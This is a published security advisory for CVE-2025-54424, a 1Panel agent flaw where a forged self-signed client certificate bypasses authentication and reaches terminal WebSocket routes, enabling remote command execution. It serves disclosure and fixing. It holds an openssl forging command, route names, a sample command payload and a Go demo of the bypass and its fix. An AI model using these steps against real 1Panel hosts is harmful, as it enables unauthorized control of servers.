
1Panel agent certificate verification bypass leading to arbitrary command execution

High
wanghe-fit2cloud published GHSA-8j63-96wh-wh3j Aug 1, 2025

Package

gomod 1Panel (Go)

Affected versions

e.g. <= v2.0.5

Patched versions

v2.0.6

Description

Project: 1Panel

Website: https://www.1panel.cn/

Date: 2025-07-26

Version: 1Panel v2.0.5

Vulnerability summary

  • 1Panel v2 introduces the concepts of a Core and an Agent: since the new release, 1Panel has node management, so other hosts can be controlled by adding them as nodes.
  • Core and Agent communicate over HTTPS, but the certificate check does not fully verify the authenticity of the client certificate, so the Agent's interfaces can be reached without authorization. Because 1Panel exposes many command-execution and other high-privilege interfaces, this results in RCE.

Code audit process

  1. Start from the Agent HTTP router file, agent/init/router/router.go.

  2. The Routers function applies the Certificate function from agent/middleware/certificate.go as a global check.

  3. The Certificate function checks c.Request.TLS.HandshakeComplete to decide whether the request arrived over a client-certificate connection.

  4. Whether c.Request.TLS.HandshakeComplete is true is decided by the tls.RequireAnyClientCert setting in the Start function of agent/server/server.go.

Note: because tls.RequireAnyClientCert is used instead of tls.RequireAndVerifyClientCert, the server only requires that the client present a certificate and never validates the issuing CA, so any self-signed certificate completes the TLS handshake.

  5. The remaining checks in the Certificate function only verify that the certificate's CN field is panel_client; the issuer is not verified. Finally, WebSocket connections turn out to bypass the Proxy-ID check.

  6. The project has many WebSocket interfaces.
  • Process WebSocket interface (with the issue above, leaks all processes and other sensitive information)
    Route: /process/ws
    Request format:
{
  "type": "ps",           // data type: ps (processes), ssh (SSH sessions), net (network connections), wget (download progress)
  "pid": 123,             // optional, filter by process ID
  "name": "process_name", // optional, filter by process name
  "username": "user"      // optional, filter by username
}

  • Terminal SSH WebSocket interface (with the issue above, executes arbitrary commands)
    Route: /hosts/terminal
    Request format:
{
  "type": "cmd",
  "data": "d2hvYW1pCg=="  // base64 of "whoami\n"; do not forget the trailing newline
}

  • Container Terminal WebSocket interface (executes commands inside containers)
    Route: /containers/terminal

  • File Download Progress WebSocket interface (pushes download progress automatically)
    Route: /files/wget/process

Attack process

  1. Generate a forged certificate:
    openssl req -x509 -newkey rsa:2048 -keyout panel_client.key -out panel_client.crt -days 365 -nodes -subj "/CN=panel_client"

  2. Present this certificate when connecting; if a WebSocket connection to one of the interfaces above succeeds, the instance is vulnerable.
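The certificate-checking mistake from audit steps 4 and 5, and the forged-certificate test from the attack process, reproduced in-process as an added Go example. This is not 1Panel's code: the helper names (newCert, asyncConn, handshake, allowed, Run), the CA and certificate names (panel_ca, panel_agent), the in-memory net.Pipe transport and the client's GetClientCertificate callback (which forces the forged certificate to be sent whatever CA list the server advertises, as an attacker's tool would) are all assumptions made for the demonstration. It runs a self-signed CN=panel_client certificate against an agent configured with tls.RequireAnyClientCert plus a CN-only check, then against the fix (tls.RequireAndVerifyClientCert with ClientCAs pinned to the panel CA), and finally checks that a CA-issued client certificate still passes the fix.

```go
package main

import (
	"crypto/ecdsa"
	"crypto/elliptic"
	"crypto/rand"
	"crypto/tls"
	"crypto/x509"
	"crypto/x509/pkix"
	"fmt"
	"math/big"
	"net"
	"time"
)

// newCert issues an ECDSA certificate for cn. parent == nil makes it self-signed (the forged
// CN=panel_client cert the openssl command above produces); otherwise parent, standing in for
// the panel's own CA, signs it. Hypothetical helper, not 1Panel code.
func newCert(cn string, isCA bool, eku x509.ExtKeyUsage, parent *tls.Certificate) tls.Certificate {
	key, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
	if err != nil {
		panic(err)
	}
	serial, _ := rand.Int(rand.Reader, big.NewInt(1<<62))
	tmpl := &x509.Certificate{
		SerialNumber:          serial,
		Subject:               pkix.Name{CommonName: cn},
		NotBefore:             time.Now().Add(-time.Hour),
		NotAfter:              time.Now().Add(24 * time.Hour),
		KeyUsage:              x509.KeyUsageDigitalSignature,
		ExtKeyUsage:           []x509.ExtKeyUsage{eku},
		BasicConstraintsValid: true,
		IsCA:                  isCA,
	}
	if isCA {
		tmpl.KeyUsage |= x509.KeyUsageCertSign
	}
	signer, signerKey := tmpl, any(key)
	if parent != nil {
		signer, signerKey = parent.Leaf, parent.PrivateKey
	}
	der, err := x509.CreateCertificate(rand.Reader, tmpl, signer, &key.PublicKey, signerKey)
	if err != nil {
		panic(err)
	}
	leaf, _ := x509.ParseCertificate(der)
	return tls.Certificate{Certificate: [][]byte{der}, PrivateKey: key, Leaf: leaf}
}

// asyncConn gives the client end of a net.Pipe a send buffer so neither side blocks on Write.
type asyncConn struct {
	net.Conn
	q chan []byte
}

func (a *asyncConn) Write(p []byte) (int, error) {
	a.q <- append([]byte(nil), p...)
	return len(p), nil
}

// handshake runs one TLS handshake in-process and returns the server-side connection state plus
// the server's handshake error. The client always presents clientCert, whatever CA list the
// server advertises, as an attacker's tool would.
func handshake(serverCfg *tls.Config, clientCert tls.Certificate) (tls.ConnectionState, error) {
	cConn, sConn := net.Pipe()
	ac := &asyncConn{Conn: cConn, q: make(chan []byte, 64)}
	go func() {
		for b := range ac.q {
			_, _ = cConn.Write(b) // a write error only means the server side is gone
		}
	}()
	client := tls.Client(ac, &tls.Config{
		InsecureSkipVerify:   true, // only the server's client-auth policy is under test
		GetClientCertificate: func(*tls.CertificateRequestInfo) (*tls.Certificate, error) { return &clientCert, nil },
	})
	server := tls.Server(sConn, serverCfg)
	_ = client.SetDeadline(time.Now().Add(5 * time.Second)) // safety net against hangs
	_ = server.SetDeadline(time.Now().Add(5 * time.Second))
	done := make(chan struct{})
	go func() {
		defer close(done)
		defer client.Close()
		if client.Handshake() == nil {
			_, _ = client.Read(make([]byte, 1)) // drain the server's tickets, alert or close_notify
		}
	}()
	err := server.Handshake()
	state := server.ConnectionState()
	_ = server.Close()
	<-done
	close(ac.q)
	return state, err
}

// allowed is the middleware decision. cnOnly reproduces the check the advisory describes (handshake
// completed and CN == panel_client, issuer ignored); otherwise a chain the server verified against
// ClientCAs is also required, and RequireAnyClientCert never produces one.
func allowed(st tls.ConnectionState, cnOnly bool) bool {
	ok := st.HandshakeComplete && len(st.PeerCertificates) > 0 && st.PeerCertificates[0].Subject.CommonName == "panel_client"
	return ok && (cnOnly || len(st.VerifiedChains) > 0)
}

// Run reports whether the forged cert gets past the vulnerable agent, whether it gets past the
// fixed agent, and whether a CA-issued panel_client cert still gets past the fixed agent.
func Run() (forgedVsVulnerable, forgedVsFixed, legitVsFixed bool) {
	ca := newCert("panel_ca", true, x509.ExtKeyUsageAny, nil)
	srv := newCert("panel_agent", false, x509.ExtKeyUsageServerAuth, &ca)
	legit := newCert("panel_client", false, x509.ExtKeyUsageClientAuth, &ca)
	forged := newCert("panel_client", false, x509.ExtKeyUsageClientAuth, nil) // openssl req -x509 ... -subj "/CN=panel_client"
	// Vulnerable pattern: tls.RequireAnyClientCert completes the handshake for any certificate at all.
	vulnerable := &tls.Config{Certificates: []tls.Certificate{srv}, ClientAuth: tls.RequireAnyClientCert}
	// Fix: tls.RequireAndVerifyClientCert with ClientCAs pinned to the panel CA.
	fixed := &tls.Config{Certificates: []tls.Certificate{srv}, ClientAuth: tls.RequireAndVerifyClientCert, ClientCAs: x509.NewCertPool()}
	fixed.ClientCAs.AddCert(ca.Leaf)
	st, err := handshake(vulnerable, forged)
	forgedVsVulnerable = err == nil && allowed(st, true)
	st, err = handshake(fixed, forged)
	forgedVsFixed = err == nil && allowed(st, false)
	st, err = handshake(fixed, legit)
	legitVsFixed = err == nil && allowed(st, false)
	return
}

func main() {
	a, b, c := Run()
	fmt.Printf("forged cert vs vulnerable agent: %v\nforged cert vs fixed agent: %v\nCA-issued cert vs fixed agent: %v\n", a, b, c)
}
```

The first result is the bug: with RequireAnyClientCert the handshake completes and HandshakeComplete is true for the attacker's self-signed certificate, so a CN-only middleware lets it through. The second shows the fix rejecting it at the TLS layer, and the third that the fix does not lock out the real Core. Note the middleware side as well: when the handshake policy is RequireAndVerifyClientCert, c.Request.TLS.VerifiedChains is non-empty, so checking that field in addition to the CN is a cheap defence in depth against a future regression of the tls.Config.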

Severity

High


CVSS v3 base metrics

Attack vector
Network
Attack complexity
High
Privileges required
None
User interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
High

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE ID

CVE-2025-54424

Weaknesses

No CWEs

Credits